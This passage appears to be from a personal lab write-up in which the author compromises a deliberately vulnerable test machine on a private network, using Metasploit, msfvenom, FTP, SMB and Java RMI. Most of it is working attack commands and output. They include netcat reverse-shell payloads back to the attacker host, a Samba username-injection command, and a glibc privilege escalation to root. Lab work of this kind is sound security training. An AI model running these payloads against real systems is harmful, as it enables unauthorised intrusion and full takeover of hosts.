set session 1
options
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) >run
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.249.147 - Collecting local exploits for php/linux...
[-] 192.168.249.147 - No suggestions available.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > [*] 192.168.249.147 - Meterpreter session 1 closed. Reason: Died
Interrupt: use the 'exit' command to quit
msf6 post(multi/recon/local_exploit_suggester) >🤔💭 No suggestions were available and the Meterpreter session closed. It seemed that the session was not a stable one
📔 Note: If by any chance that the output error is 'segmentation fault', it could be due to the usage of a staged payload 'linux/x86/shell/everse_tcp' instead of a stageless payload 'linux/x86/shell_reverse_tcp'
Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212
👍 Exploitation: "Succeeded" FTP / Apache (Msfvenom Payload)
I will use the 'php/exec' payload with Msfvenom next
msfvenom -p php/exec cmd='nc 192.168.249.140 7777 -e /bin/sh' lhost=192.168.249.140 lport=7777 -f raw -o phpexec.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ msfvenom -p php/exec cmd='nc 192.168.249.140 7777 -e /bin/sh' lhost=192.168.249.140 lport=7777 -f raw -o phpexec.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1378 bytes
Saved as: phpexec.phpI will upload the 'phpexec.php' payload via FTP port 2121 using the leaked credentials from earlier
ftp 192.168.249.147 2121
put phpexec.php
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ ftp 192.168.249.147 2121
Connected to 192.168.249.147.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.249.147]
Name (192.168.249.147:kali): xxxx
331 Password required for xxxx
Password:
230 User xxxxlogged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put phpexec.php
local: phpexec.php remote: phpexec.php
229 Entering Extended Passive Mode (|||40553|)
150 Opening BINARY mode data connection for phpexec.php
100% |***********************************************************************************************| 1378 12.75 MiB/s 00:00 ETA
226 Transfer complete
1378 bytes sent in 00:00 (2.59 MiB/s)
ftp>👍 Exploitation: "Succeeded" Listener (Msfconsole)
Start msfconsole, use the exploit, set the payload and execute run. The process is the same as from the earlier example
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 192.168.249.140
set lport 7777
options
run
┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.249.140:7777 
After the reverse TCP handler has started, I will visit the URL of the 'phpexec.php' to trigger the payload as shown in Figure 3 or execute 'curl 192.168.249.147/phpexec.php'
┌──(kali㉿kali)-[~/custom1/ftpm]
└─$ curl 192.168.249.147/phpexec.phpI managed to gain a command shell session. The 'whoami' command was executed to check the name of the user
whoami
[*] Command shell session 1 opened (192.168.249.140:7777 -> 192.168.249.147:51175 ) at 2022-03-28 19:06:39 +0800
whoami
www-data🤔💭 I will need to escalate privilege as the current user is 'www-data'
I sent the command shell session to the background and search and use the 'suggester'
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
options
[*] Command shell session 1 opened (192.168.249.140:7777 -> 192.168.249.147:51175 ) at 2022-03-28 19:06:39 +0800
whoami
www-data
^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) >run
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.249.147 - Collecting local exploits for x86/linux...
[*] 192.168.249.147 - 39 exploit checks are being tried...
[+] 192.168.249.147 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 192.168.249.147 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 192.168.249.147 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.249.147 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.249.147 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Post module execution completedI will use 'exploit/linux/local/glibc_ld_audit_dso_load_priv_esc' from the list and set the payload to use
use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.249.140
set lport 7777
set session 1
options
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 192.168.249.140
=> 192.168.249.140
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 7777
lport => 7777
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options
Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SUID_EXECUTABLE /bin/ping yes Path to a SUID executable
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) >run
getuid
sysinfo
msf6 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run
[*] Started reverse TCP handler on 192.168.249.140:7777
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.466awTG' (1271 bytes) ...
[*] Writing '/tmp/.v9MErF' (281 bytes) ...
[*] Writing '/tmp/.WzQ5NnlMC' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (989032 bytes) to 192.168.249.147
[*] Meterpreter session 2 opened (192.168.249.140:7777 -> 192.168.249.147:57938 ) at 2022-03-28 19:11:17 +0800
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.249.147
OS : Ubuntu x8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >😄 Finally managed to gain the user 'root'!
👌 Enumeration: "It Worked" Samba (SMBmap)
I will use SMBmap to scan the target's port that is running Samba service to find potential information
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)smbmap -H 192.168.249.147 -P 139
┌──(kali㉿kali)-[~/custom1]
└─$ smbmap -H 192.168.249.147 -P 139
[+] IP: 192.168.249.147:139 Name: 192.168.249.147
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (custom1 server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (custom1 server (Samba 3.0.20-Debian))🤔💭 smbmap showed that there is a 'tmp' directory with 'Read, Wrtie' permissions
Disk Permissions Comment
---- ----------- -------
tmp READ, WRITE oh noes!👍 Exploitation: "Succeeded" Samba (NC / SMBClient)
Using smbclient to check for anonymous login access
smbclient -L 192.168.249.147
Press 'Enter' when it prompted for a password
┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.249.147
Enter WORKGROUP\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (custom1 server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (custom1 server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP custom1Start a listener
nc -nlvp 5566
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 5566
listening on [any] 5566 ...Open another terminal window and access the target's 'tmp' directory
smbclient //192.168.249.147/tmp
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.249.147/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 
Figure 4 above shows 2 opened terminals:
Left terminal: listener
Right terminal: smbclient
Execute the following 'logon' command to make a reverse shell connection
logon "/=`
nc 192.168.249.140 5566 -e /bin/bash`"Press 'Enter' when it prompted for a password
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.249.147/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nc 192.168.249.140 5566 -e /bin/bash`"
Password:
smb: \> The netcat terminal will receive a connection with a shell session
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 5566
listening on [any] 5566 ...
connect to [192.168.249.140] from (UNKNOWN) [192.168.249.147] 56735whoami
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 5566
listening on [any] 5566 ...
connect to [192.168.249.140] from (UNKNOWN) [192.168.249.147] 56735
whoami
root😄 It returned with a shell session and upon executing 'whoami', 'root' user was displayed
👍 Exploitation: "Succeeded" Samba (Msfconsole)
search Samba 3.0.20
msf6 > search Samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 >
🤔💭 The above result did not mention the exact Samba 3.0.20 version. However, I will give it a try since it was ranked 'excellent'
options
set lport 5566 (I will usually not use the default 4444)
set lhost 192.168.249.140 <locahost IP>
set rhosts 192.168.249.147 <target IP>
msf6 exploit(multi/samba/usermap_script) > options
msf6 exploit(multi/samba/usermap_script) > set lport 5566
lport => 5566
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.249.147
rhosts => 192.168.249.147
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) >run
whoami
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] Command shell session 1 opened (192.168.249.140:5566 -> 192.168.249.147:38239 ) at 2022-03-25 22:35:16 +0800
whoami
root😄 It returned with a shell session and upon executing 'whoami', 'root' user was displayed
Executing the following code will display a 'prettier 'shell session
python -c 'import pty:pty.spawn("bin/bash")'
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] Command shell session 1 opened (192.168.249.140:5566 -> 192.168.249.147:38239 ) at 2022-03-25 22:35:16 +0800
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@custom1:/# whoami
whoami
root
root@custom1:/# 😢 Exploitation: "Blunder" Java RMI (Msfconsole)
I had restarted the target machine however I was still using the previous nmap scan to try and exploit port 50981 running the Java-RMI service
50981/tcp open java-rmi syn-ack ttl 64 GNU Classpath grmiregistryset rport 50981 😢
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 50981 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] 192.168.249.147:50981 - Using URL: http://0.0.0.0:8080/2YcJiIfyJbDbfvC
[*] 192.168.249.147:50981 - Local IP: http://192.168.249.140:8080/2YcJiIfyJbDbfvC
[*] 192.168.249.147:50981 - Server started.
[-] 192.168.249.147:50981 - Exploit failed [unreachable]: RuntimeError The connection was refused by the remote host (192.168.249.147:50981).
[*] 192.168.249.147:50981 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >🤔💭 I kept getting the following error no matter how I change the parameters in the options and I was totally clueless what went wrong. It was perfectly fine the other day when I managed to exploit it.
[-] 192.168.249.147:50981 - Exploit failed [unreachable]: RuntimeError The connection was refused by the remote host (192.168.249.147:50981).
👍 Exploitation: "Succeeded" Java RMI (Msfconsole)
🤔💭 After a good 20-30 mins of going round in circle, I decided to give it a last shot by performing another Nmap scan
nmap -sV -p- --open 192.168.249.147
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- --open 192.168.249.147
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 23:02 +08
Nmap scan report for 192.168.249.147
Host is up (0.0035s latency).
Not shown: 65505 closed tcp ports (conn-refused), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: cannot locate user specified in 'ftp_username':ftp)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp open ftp ProFTPD 1.3.1
36398/tcp open nlockmgr 1-4 (RPC #100021)
42925/tcp open status 1 (RPC #100024)
47102/tcp open mountd 1-3 (RPC #100005)
56886/tcp open java-rmi GNU Classpath grmiregistry
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.29 seconds🤔💭 Mystery solved: the port has changed to 56886 instead
56886/tcp open java-rmi GNU Classpath grmiregistryHence I started Msfconsole, search for the exploit and run it
msfconsole
search type:exploit java rmi
msf6 > search type:exploit java rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
1 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
2 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
4 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
5 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
8 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_execuse exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.147
set rport 56886 ☺️
set lhost 192.168.249.140
set lport 5566
options
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.147
rhosts => 192.168.249.147
msf6 exploit(multi/misc/java_rmi_server) > set rport 56886
rport => 49495
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 5566
lport => 5566
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.249.147 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 56886 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.140 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)run
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.249.140:5566
[*] 192.168.249.147:56886 - Using URL: http://0.0.0.0:8080/vCZoxN3
[*] 192.168.249.147:56886 - Local IP: http://192.168.249.140:8080/vCZoxN3
[*] 192.168.249.147:56886 - Server started.
[*] 192.168.249.147:56886 - Sending RMI Header...
[*] 192.168.249.147:56886 - Sending RMI Call...
[*] 192.168.249.147:56886 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.147
[*] Meterpreter session 1 opened (192.168.249.140:5566 -> 192.168.249.147:42577 ) at 2022-03-29 20:30:57 +0800
[-] 192.168.249.147:56886 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.147:56886 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >🤔💭 I am getting the following errors:
[-] 192.168.249.147:56886 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.147:56886 - Server stopped.
[*] Exploit completed, but no session was created.🤔💭 However it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check if there was indeed one
sessions
msf6 exploit(multi/browser/java_rmi_connection_impl) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ custom1 192.168.249.140:5566 -> 192.168.249.147:42577 (192.168.249.147)sessions 1
getuid
sysinfo
msf6 exploit(multi/browser/java_rmi_connection_impl) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : custom1
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > 😄 Executing 'getuid' reflected that the Sever username is 'root'!
Last updated